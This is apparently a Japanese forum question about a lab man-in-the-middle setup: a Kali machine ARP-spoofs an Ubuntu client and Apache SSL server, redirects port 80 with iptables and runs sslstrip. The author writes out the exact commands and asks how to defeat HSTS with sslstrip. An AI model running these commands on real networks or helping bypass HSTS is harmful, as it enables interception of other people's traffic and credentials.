3台のマシンがスイッチに接続されたLANがあります。 2台のマシンがUbuntu 15.04を実行し、1台はApache SSLがインストールされ、ウェブサーバーとして機能します。 Ubuntuを実行している別のマシンがクライアントとして機能します。攻撃者のマシンはKali 2.0を実行しています。
すべてのマシンには手動でIPアドレスが割り当てられています。
Client: 192.168.1.1 HW: 08:00:27:2a:ec:cc
Server: 192.168.1.2 HW: 00:11:22:33:44:55
Kali: 192.168.1.3 HW: 08:00:27:fa:25:8e
Kaliで次のコマンドを実行しました。
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
次に、sslstrip -k -l 8080
を実行します。
次に、arpspoof
を開始します。
arpspoof -i eth0 -t 192.168.1.1 192.168.1.2
arpspoof -i eth0 -t 192.168.1.2 192.168.1.1
クライアントとサーバーのarpテーブルはどちらもスプーフィングされており、Kaliマシンのハードウェアが含まれています。
私はWireshark Kaliも実行しています。 https://192.168.1.2/test.html
を使用して、クライアントからサーバーからWebサイトにアクセスすると、Webサイトが表示されます。また、wiresharkでSSL/TLSハンドシェイクのすべてのパケットを確認できます。しかし、sslstrip
は何も表示しません!?
この攻撃は古いWebブラウザでも機能します!しかし、現実には、現在ほとんどのサーバーでHSTS(HTTP Strict Transport Security)が有効になっています。
それで、HSTSが彼の仕事をしている場合でも、sslstripする方法は?